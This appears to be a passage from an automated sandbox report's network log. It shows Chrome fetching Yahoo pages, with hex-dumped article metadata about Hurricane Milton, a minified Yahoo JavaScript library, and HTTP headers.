                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ceParentTags":[]},{"term":"WIKIID:John_Milton","label":"Milton","capAbtScore":"0.871","metaData":[{"visible":"false"}],"startchar":489,"endchar":494,"specialParentTags":["a","strong","h2","title","figcaption"],"instanceParentTags":["figcaption"]},{"term":
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 22 2c 22 68 32 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 68 32 22 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 52 6f 6e 5f 44 65 53 61 6e 74 69 73 22 2c 22 6c 61 62 65 6c 22 3a 22 52 6f 6e 20 44 65 53 61 6e 74 69 73 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 37 36 36 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 32 32 34 32 2c 22 65 6e 64 63 68 61 72 22 3a 32 32 35 33 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 59 43 54 3a 30 30 31 30 30 30 36 35 35 22 2c 22 73 63 6f 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ","h2"],"instanceParentTags":["h2"]},{"term":"WIKIID:Ron_DeSantis","label":"Ron DeSantis","capAbtScore":"0.766","metaData":[{"visible":"false"}],"startchar":2242,"endchar":2253,"specialParentTags":[],"instanceParentTags":[]},{"term":"YCT:001000655","score
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 65 20 48 65 6c 65 6e 65 2c 20 4e 61 74 69 6f 6e 61 6c 20 4f 63 65 61 6e 69 63 20 61 6e 64 20 41 74 6d 6f 73 70 68 65 72 69 63 20 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 2c 20 6d 61 6a 6f 72 20 68 75 72 72 69 63 61 6e 65 2c 20 57 61 74 63 68 65 73 20 61 6e 64 20 77 61 72 6e 69 6e 67 73 2c 20 52 6f 6e 20 44 65 53 61 6e 74 69 73 22 2c 22 6d 65 74 61 22 3a 7b 22 74 77 69 74 74 65 72 48 61 6e 64 6c 65 22 3a 22 40 73 74 61 62 6c 65 66 6f 72 64 22 7d 2c 22 6d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 54 75 65 2c 20 30 38 20 4f 63 74 20 32 30 32 34 20 31 38 3a 34 35 3a 34 34 20 47 4d 54 22 2c 22 70 61 67 65 54 69 74 6c 65 22 3a 22 48 75 72 72 69 63 61 6e 65 20 4d 69 6c 74 6f 6e 20 74 72 61 63 6b 65 72 3a 20 43 61 74 65 67 6f 72 79 20 34 20 73 74 6f 72 6d 20 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e Helene, National Oceanic and Atmospheric Administration, major hurricane, Watches and warnings, Ron DeSantis","meta":{"twitterHandle":"@stableford"},"modifiedDate":"Tue, 08 Oct 2024 18:45:44 GMT","pageTitle":"Hurricane Milton tracker: Category 4 storm h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 7d 2c 22 73 68 6f 77 45 64 69 74 6f 72 69 61 6c 50 69 63 6b 73 50 6c 61 63 65 68 6f 6c 64 65 72 22 3a 66 61 6c 73 65 2c 22 73 6c 69 63 6b 54 68 75 6d 62 6e 61 69 6c 22 3a 7b 7d 2c 22 73 70 61 63 65 49 64 22 3a 22 31 31 39 37 37 39 32 34 34 36 22 2c 22 73 70 6f 6e 73 6f 72 65 64 43 6f 6e 74 65 6e 74 22 3a 66 61 6c 73 65 2c 22 73 75 6d 6d 61 72 79 22 3a 22 54 68 65 20 68 75 72 72 69 63 61 6e 65 20 69 73 20 66 6f 72 65 63 61 73 74 20 74 6f 20 6d 61 6b 65 20 6c 61 6e 64 66 61 6c 6c 20 69 6e 20 46 6c 6f 72 69 64 61 20 57 65 64 6e 65 73 64 61 79 20 6e 69 67 68 74 2c 20 61 63 63 6f 72 64 69 6e 67 20 74 6f 20 74 68 65 20 4e 61 74 69 6f 6e 61 6c 20 48 75 72 72 69 63 61 6e 65 20 43 65 6e 74 65 72 2e 22 2c 22 74 69 74 6c 65 22 3a 22 48 75 72 72 69 63 61 6e 65 20 4d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: },"showEditorialPicksPlaceholder":false,"slickThumbnail":{},"spaceId":"1197792446","sponsoredContent":false,"summary":"The hurricane is forecast to make landfall in Florida Wednesday night, according to the National Hurricane Center.","title":"Hurricane M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 69 64 61 73 2d 67 75 6c 66 2d 63 6f 61 73 74 2d 6d 61 73 73 69 76 65 2d 65 76 61 63 75 61 74 69 6f 6e 73 2d 6f 72 64 65 72 65 64 2d 31 36 30 31 32 30 39 33 34 2e 68 74 6d 6c 22 2c 22 56 55 49 44 22 3a 22 4d 52 59 79 65 37 53 2d 66 51 42 78 39 51 6e 30 45 4f 52 58 78 41 22 7d 7d 2c 22 6d 6f 64 75 6c 65 73 22 3a 7b 7d 2c 22 6d 61 72 6b 75 70 22 3a 22 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 63 61 61 73 20 63 61 61 73 2d 63 63 20 66 72 6f 6e 74 70 61 67 65 20 65 6e 61 62 6c 65 45 56 50 6c 61 79 65 72 20 65 6e 61 62 6c 65 4f 76 65 72 72 69 64 65 53 70 61 63 65 49 64 20 63 6f 6e 74 65 6e 74 46 65 65 64 62 61 63 6b 45 6e 61 62 6c 65 64 20 65 6e 61 62 6c 65 41 64 46 65 65 64 62 61 63 6b 56 32 20 65 6e 61 62 6c 65 49 6e 41 72 74 69 63 6c 65 41 64 20 65 6e 61 62 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: idas-gulf-coast-massive-evacuations-ordered-160120934.html","VUID":"MRYye7S-fQBx9Qn0EORXxA"}},"modules":{},"markup":"<div class=\"caas caas-cc frontpage enableEVPlayer enableOverrideSpaceId contentFeedbackEnabled enableAdFeedbackV2 enableInArticleAd enabl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 72 79 20 61 67 61 69 6e 5c 22 2c 5c 22 55 50 44 41 54 45 5c 22 3a 5c 22 75 70 64 61 74 65 5c 22 2c 5c 22 55 50 44 41 54 45 53 5c 22 3a 5c 22 75 70 64 61 74 65 73 5c 22 2c 5c 22 56 49 44 45 4f 5f 41 31 31 59 5f 44 49 53 41 42 4c 45 5f 46 55 4c 4c 53 43 52 45 45 4e 5c 22 3a 5c 22 46 75 6c 6c 20 53 63 72 65 65 6e 2c 20 62 75 74 74 6f 6e 2c 20 64 69 73 61 62 6c 65 64 2c 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 66 6f 72 20 73 63 72 65 65 6e 20 72 65 61 64 65 72 20 75 73 65 72 73 5c 22 7d 27 20 64 61 74 61 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 64 61 74 61 2d 74 7a 3d 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 20 64 61 74 61 2d 70 61 72 61 6d 73 3d 27 7b 5c 22 66 65 61 74 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: g went wrong. Try again\",\"UPDATE\":\"update\",\"UPDATES\":\"updates\",\"VIDEO_A11Y_DISABLE_FULLSCREEN\":\"Full Screen, button, disabled, temporarily not available for screen reader users\"}' data-lang=en-US data-tz=America/New_York data-params='{\"featu


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              112192.168.2.45113887.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC366OUTGET /aaq/wf/wf-fetch-1.19.1-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 0m4CPCqTqvnovvucYk1vNBtH0V+Y++ghtaYV1xzHBRKVZSFAFX0sAzEVo41jDsP4RnQIyaJB0wY=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: Y1S1CBN80W7RPP28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 14:04:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 20 Oct 2023 09:18:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "f085d6c42acb1394e457e463230de8ba"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: XcyEKreDz4JYLdlgGq65LAHV5Dsub3V6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 16798
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 104946
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 66 65 74 63 68 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 66 65 74 63 68 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-fetch",[],t):"object"==typeof exports?exports["wafer-fetch"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ction"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Objec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 6c 6c 79 7b 69 66 28 69 29 74 68 72 6f 77 20 61 7d 7d 72 65 74 75 72 6e 20 72 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 20 74 3b 69 66 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 6e 20 4f 62 6a 65 63 74 28 74 29 29 72 65 74 75 72 6e 20 65 28 74 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: lly{if(i)throw a}}return r}return function(t,r){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t))return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),h=function(){function e(e,t){for(var r=0;r<t.length;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 2e 75 72 6c 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 75 72 6c 22 29 2c 68 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 62 6f 75 6e 64 61 72 79 22 29 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 22 29 2c 79 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 72 65 64 65 6e 74 69 61 6c 73 22 29 2c 76 3d 63 2e 5f 75 74 69 6c 2e 63 61 63 68 65 4b 65 79 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 2d 6b 65 79 22 29 2c 6d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 2d 73 74 72 61 74 65 67 79 22 29 7c 7c 22 6e 65 74 77 6f 72 6b 46 69 72 73 74 22 2c 70 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 2d 74 74 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .url||e.getAttribute(b+"url"),h=e.getAttribute(b+"boundary"),d=e.getAttribute(b+"cache"),y=e.getAttribute(b+"credentials"),v=c._util.cacheKey||e.getAttribute(b+"cache-key"),m=e.getAttribute(b+"cache-strategy")||"networkFirst",p=e.getAttribute(b+"cache-ttl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 2c 56 3d 6e 75 6c 6c 29 2c 22 73 74 61 74 65 43 68 61 6e 67 65 22 21 3d 3d 58 7c 7c 48 7c 7c 28 48 3d 30 29 2c 30 21 3d 3d 59 29 73 77 69 74 63 68 28 58 29 7b 63 61 73 65 22 69 6e 74 65 72 76 61 6c 22 3a 63 61 73 65 22 6f 6e 4c 6f 61 64 22 3a 63 61 73 65 22 73 74 61 74 65 43 68 61 6e 67 65 22 3a 63 61 73 65 22 76 69 65 77 70 6f 72 74 22 3a 59 3d 32 7d 69 66 28 22 61 63 74 69 76 61 74 65 22 21 3d 3d 58 26 26 22 65 61 63 68 43 6c 69 63 6b 22 21 3d 3d 58 26 26 22 69 6e 74 65 72 76 61 6c 22 21 3d 3d 58 26 26 22 73 74 61 74 65 43 68 61 6e 67 65 22 21 3d 3d 58 26 26 22 74 61 62 41 63 74 69 76 61 74 65 22 21 3d 3d 58 7c 7c 28 7a 3d 21 30 29 2c 21 4b 29 7b 76 61 72 20 4a 3d 5f 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 66 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,V=null),"stateChange"!==X||H||(H=0),0!==Y)switch(X){case"interval":case"onLoad":case"stateChange":case"viewport":Y=2}if("activate"!==X&&"eachClick"!==X&&"interval"!==X&&"stateChange"!==X&&"tabActivate"!==X||(z=!0),!K){var J=_(e.getElementsByClassName("fe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 6f 75 73 65 65 6e 74 65 72 22 3d 3d 3d 58 3f 28 63 2e 5f 75 74 69 6c 2e 68 61 73 4d 6f 75 73 65 65 6e 74 65 72 3d 21 30 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 29 3a 22 74 61 62 41 63 74 69 76 61 74 65 22 3d 3d 3d 58 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 77 66 2d 74 72 69 67 67 65 72 2d 61 63 74 69 76 61 74 65 64 22 29 26 26 21 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 3f 63 2e 66 65 74 63 68 28 29 3a 22 6f 6e 4c 6f 61 64 22 3d 3d 3d 58 26 26 63 2e 66 65 74 63 68 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 63 2e 64 65 73 74 72 6f 79 28 29 7d 29 2c 63 7d 72 65 74 75 72 6e 20 6f 28 74 2c 65 29 2c 68 28 74 2c 5b 7b 6b 65 79 3a 22 66 65 74 63 68 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ouseenter"===X?(c._util.hasMouseenter=!0,c.addEventListeners()):"tabActivate"===X&&e.classList.contains("wf-trigger-activated")&&!e.classList.contains(s)?c.fetch():"onLoad"===X&&c.fetch().then(function(e){e&&c.destroy()}),c}return o(t,e),h(t,[{key:"fetchD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 73 2e 5f 75 74 69 6c 2e 74 61 72 67 65 74 45 6c 65 6d 7d 7d 2c 7b 6b 65 79 3a 22 66 65 74 63 68 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 74 2e 64 69 73 61 62 6c 65 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 2c 61 3d 74 2e 63 75 72 72 65 6e 74 53 65 73 73 69 6f 6e 52 65 74 72 79 43 6f 75 6e 74 2c 6f 3d 76 6f 69 64 20 30 3d 3d 3d 61 3f 30 3a 61 2c 73 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 63 3d 73 2e 65 6c 65 6d 2c 75 3d 73 2e 73 68 6f 75 6c 64 41 6c 77 61 79 73 54 72 69 67 67 65 72 2c 6c 3d 73 2e 73 75 63 63 65 73 73 43 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s._util.targetElem}},{key:"fetch",value:function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},r=t.disable,i=void 0===r||r,a=t.currentSessionRetryCount,o=void 0===a?0:a,s=this._util,c=s.elem,u=s.shouldAlwaysTrigger,l=s.successCl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 68 3f 4f 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 4f 2e 73 6c 69 63 65 28 31 29 3a 22 22 2c 61 3d 65 5b 22 68 61 6e 64 6c 65 22 2b 72 5d 2c 6f 3d 74 2e 5f 66 65 74 63 68 4d 65 74 61 2c 73 3d 76 6f 69 64 20 30 3d 3d 3d 6f 3f 7b 7d 3a 6f 2c 68 3d 6e 28 74 2c 5b 22 5f 66 65 74 63 68 4d 65 74 61 22 5d 29 2c 62 3d 73 2e 64 75 72 61 74 69 6f 6e 2c 41 3d 73 2e 73 6f 75 72 63 65 2c 54 3d 76 6f 69 64 20 30 3b 69 66 28 69 26 26 28 75 7c 7c 63 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 70 2e 72 65 70 6c 61 63 65 28 22 2e 22 2c 22 22 29 29 2c 64 26 26 64 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 61 73 2d 77 61 66 65 72 2d 66 65 74 63 68 2d 65 72 72 6f 72 22 2c 22 77 61 66 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79 2d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: h?O[0].toUpperCase()+O.slice(1):"",a=e["handle"+r],o=t._fetchMeta,s=void 0===o?{}:o,h=n(t,["_fetchMeta"]),b=s.duration,A=s.source,T=void 0;if(i&&(u||c.classList.remove(p.replace(".","")),d&&d.classList.remove("has-wafer-fetch-error","wafer-fetch-boundary-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 6f 6e 3a 62 2c 73 6f 75 72 63 65 3a 41 2c 74 61 72 67 65 74 45 6c 65 6d 3a 54 7c 7c 53 2c 75 72 6c 3a 6a 7d 7d 29 2c 21 30 7d 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 65 2e 5f 64 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 72 3d 74 7c 7c 7b 7d 2c 6e 3d 72 2e 6d 65 73 73 61 67 65 3b 69 66 28 6a 3d 65 2e 5f 75 74 69 6c 2e 75 72 6c 2c 2b 2b 6f 2c 22 4e 6f 74 20 66 6f 75 6e 64 22 21 3d 3d 6e 26 26 62 26 26 6f 3c 62 29 72 65 74 75 72 6e 20 65 2e 5f 73 74 61 74 65 2e 73 74 61 74 75 73 3d 32 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 66 2d 73 65 73 73 69 6f 6e 2d 72 65 74 72 79 2d 63 6f 75 6e 74 65 72 22 2c 6f 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 66 65 74 63 68 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: on:b,source:A,targetElem:T||S,url:j}}),!0}}).catch(function(t){if(!e._destroyed){var r=t||{},n=r.message;if(j=e._util.url,++o,"Not found"!==n&&b&&o<b)return e._state.status=2,c.setAttribute("data-wf-session-retry-counter",o),setTimeout(function(){e.fetch(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 65 61 64 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 68 65 61 64 3b 5f 28 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 7c 7c 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 2c 6e 3d 65 2e 69 6e 6e 65 72 54 65 78 74 3b 6e 26 26 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3d 3d 3d 72 26 26 28 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2c 45 28 7b 63 68 65 63 6b 50 61 67 65 46 6f 72 53 63 72 69 70 74 3a 21 30 2c 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ead||document.getElementsByTagName("head")[0];var t=this._util.head;_(e.querySelectorAll("script")).forEach(function(e){var r=e.getAttribute("type")||"text/javascript",n=e.innerText;n&&"text/javascript"===r&&(t.appendChild(e),E({checkPageForScript:!0,type


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              113192.168.2.45113687.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1006OUTPOST /fp_ms/_rcv/remote?ctrl=Shopping&m_id=react-wafer-shopping&m_mode=json&partner=none HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 297
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-webp: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
